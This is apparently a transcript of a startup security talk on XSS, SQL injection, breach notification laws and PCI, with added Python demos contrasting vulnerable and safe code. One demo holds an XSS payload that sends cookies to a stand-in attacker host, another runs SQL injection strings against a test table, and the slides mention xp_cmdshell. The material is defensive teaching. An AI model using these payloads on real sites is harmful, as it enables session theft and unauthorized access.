Hacking and Compliance in a Web 2.0 World. Damon P. Cortesi, CISSP, Director @ Alchemy Security. Stats Nut | Security Geek | Builder of Tools
StartPad Countdown 2 - Startup Security: Hacking and Compliance in a Web 2.0 World
Damon Cortesi of Alchemy Security presents the most effective ways to plug the most common holes found in web services. Learn about XSS, SQL injection, and why you should care about these things now instead of later.
Transcript
Hacking and Compliance in a Web 2.0 World
Damon P. Cortesi, CISSP
Director @ Alchemy Security
Stats Nut | Security Geek | Builder of Tools
$ whoami
Connecticut >> Chicago >> Seattle (2006)
@dacort on Twitter (http://tweetstats.com)
Things you still need to watch out for.
E-commerce Startups and Compliance
What is this PCI thing you speak of?
Privacy Policy and Data Breach Notification Laws.
And maybe if we're lucky...demo time.
Web 2.0 Frameworks
Rails, Django, CakePHP
Rapid Development, Data abstraction
Alleviates common security pain points
SQL Injection
Cross-Site Scripting (kind of ...)
Typical challenges still present
The "kind of" - XSS
As of Django 1.0 (Sep 2008), HTML is auto-escaped
YAYYYYYYYYYYYY!
Does Rails? ------------------------- No
Does Google App Engine? -------- No
Really? Yup, really. (No domain-wide cookies, phew!)
Does ASP.NET ---------------------- On built-in controls
Also has built-in request validation
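What framework auto-escaping buys you, and why the slide says "kind of": the following is an added example for this page, not code from the talk or from any of the frameworks named. It renders a constructed user-supplied display name with and without HTML escaping (Python's html.escape stands in for a template engine's auto-escape), then shows that escaping is context-blind: a javascript: URL dropped into an href contains no HTML metacharacters, so escaping leaves it executable, and only a scheme allow-list (the hypothetical is_safe_url below) closes that hole.

```python
import html
from urllib.parse import urlparse

# Constructed sample input: a "display name" carrying a reflected XSS payload
# that ships the victim's cookie to an attacker-controlled host (hypothetical domain).
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_unescaped(name):
    # Pre-auto-escape behaviour: the value is dropped into the page verbatim,
    # so the browser parses and runs the <script> element.
    return "<p>Hello, %s!</p>" % name


def render_escaped(name):
    # What auto-escaping does in HTML body context: < > & " ' become entities,
    # so the browser displays the payload as text instead of executing it.
    return "<p>Hello, %s!</p>" % html.escape(name, quote=True)


def contains_script_tag(page):
    # Crude check used only to show the difference between the two renderings.
    return "<script>" in page.lower()


def render_link(url):
    # Same escaping applied in an attribute context. "javascript:alert(1)" has
    # no metacharacters, so html.escape returns it unchanged and the link still
    # executes on click. This is the gap auto-escaping does not cover.
    return '<a href="%s">profile</a>' % html.escape(url, quote=True)


def is_safe_url(url):
    # The attribute-context fix: allow-list the scheme rather than escape.
    # Leading whitespace and mixed case are normalised the way browsers do.
    scheme = urlparse(url.strip()).scheme.lower()
    return scheme in ("http", "https")


if __name__ == "__main__":
    print(render_unescaped(PAYLOAD))
    print(render_escaped(PAYLOAD))
    print(render_link("javascript:alert(1)"))
    for u in ("javascript:alert(1)", " JavaScript:alert(1)", "https://example.com/u/dacort"):
        print(repr(u), "safe" if is_safe_url(u) else "REJECTED")
```

The takeaway for the slide's "Does Rails?/Does App Engine?" rows is that even where the answer is "yes", escaping only protects the HTML body context; URLs, unquoted attributes and inline JavaScript each need their own validation.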
Define Briefly
SQL Injection - Unsanitized data being passed to a database, potentially executing arbitrary code.
dpc' OR 'a'='a
xp_cmdshell
XSS - Unsanitized data being re-displayed and interpreted in the browser.
Can ultimately allow for compromise of user data (cookies) if trusted domain is vulnerable to XSS, etc
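The slide's `dpc' OR 'a'='a` payload, run end to end: this is an added example for this page, not code from the talk. It builds a constructed in-memory SQLite users table, then compares a login check that glues input into the SQL text (the bug) with the parameterized form (what the ORMs on the previous slide generate for you). The table contents, user and passwords are invented for the demo.

```python
import sqlite3


def make_db():
    # Constructed sample database: one account whose password the attacker does not know.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('dpc', 'correct horse battery staple')")
    return db


def login_vulnerable(db, username, password):
    # Input is interpolated into the statement. The quote in the username ends
    # the string literal and everything after it is parsed as SQL, so
    #   dpc' OR 'a'='a   gives   ... WHERE username = 'dpc' OR 'a'='a' AND password = 'x'
    # AND binds tighter than OR, so username = 'dpc' alone satisfies the WHERE.
    sql = "SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'" % (username, password)
    return db.execute(sql).fetchone()[0] > 0


def login_parameterized(db, username, password):
    # Placeholders: the driver sends the values separately from the statement
    # text, so a quote is just a character in the username and never changes
    # the query's structure.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone()[0] > 0


# Two classic payloads: the slide's tautology, and a comment that drops the password clause.
TAUTOLOGY = "dpc' OR 'a'='a"
COMMENT_OUT = "dpc'--"


def demo():
    db = make_db()
    results = {}
    for payload in (TAUTOLOGY, COMMENT_OUT):
        results[payload] = {
            "vulnerable": login_vulnerable(db, payload, "wrong-password"),
            "parameterized": login_parameterized(db, payload, "wrong-password"),
        }
    # Sanity check: the real credentials still work through the safe path.
    results["legit"] = login_parameterized(db, "dpc", "correct horse battery staple")
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(repr(k), v)
```

The xp_cmdshell line on the slide is the Microsoft SQL Server extension of the same bug: once input can alter the statement, the damage is bounded only by what the database account is allowed to do, which is why the least-privileged DB user matters as much as the placeholder.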
Some Other Things...
Keeping systems/software up-to-date
Some of that data is restricted, though!
Personally Identifiable Information (PII)
Data Breach Notification Laws
Payment Card Industry (Credit Cards, PCI)
So you're building a web service...
...what do you need to know?
Planning and Process
44 states have data breach notification laws
Name, address, email
Social Security Number
Passport ID, License Number
If you are compromised and the above data was stored unencrypted, you must notify the data owners.
Data Breach/Privacy Policy
Data Breach Laws are why services such as Twitter and Evernote have this in their Privacy Policy.
If Evernote learns of a security system breach we may attempt to notify you and provide information on protective steps, if available, through the e-mail address that you supplied during registration or posting a notice on our web site. Depending on where you live, you may have a legal right to receive such notices in writing. -- http://evernote.com/about/privacy/
We will make any legally-required disclosures of any breach of the security, confidentiality, or integrity of your unencrypted electronically stored personal data to you via email or conspicuous posting on this Site in the most expedient time possible and without unreasonable delay. -- http://twitter.com/privacy
PCI only applies to you if you "store, process, or transmit cardholder data."
Want the PCI compliance monkey off your back?
"It's simple, just don't ever store, process, or transmit cardholder data - let someone else do it for you."
And if you must store, process, or transmit ... call us.
PCI If You Have To
Cardholder data is defined as the primary account number ("PAN," or credit card number) and other data obtained as part of a payment transaction, including the following data elements:
PAN
Cardholder Name
Expiration Date
Service Code
Sensitive Authentication Data: (1) full magnetic stripe data, (2) CAV2/CVC2/CVV2/CID, and (3) PINs/PIN blocks